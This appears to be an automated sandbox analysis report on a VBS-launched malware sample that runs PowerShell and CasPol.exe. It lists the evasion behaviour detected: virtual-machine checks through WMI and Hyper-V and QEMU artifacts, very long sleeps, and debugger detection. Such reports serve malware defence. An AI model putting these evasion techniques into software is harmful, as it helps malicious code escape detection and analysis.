Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Potential evasive VBS script found (use of timer() function in loop)
Source: Initial file Initial file: do while timer-temp<sec
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4288 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4288 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2372 Thread sleep count: 691 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2372 Thread sleep time: -345500s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4288 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9255 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 691 Jump to behavior
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Evasive API call chain: RegQueryValue,DecisionNodes,Sleep
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe System information queried: ModuleInformation Jump to behavior
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000008.00000002.10123763226.0000000001306000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: CasPol.exe, 00000008.00000002.10121705429.000000000129B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000008.00000002.10125915839.0000000002D09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_20336418 LdrInitializeThunk, 8_2_20336418
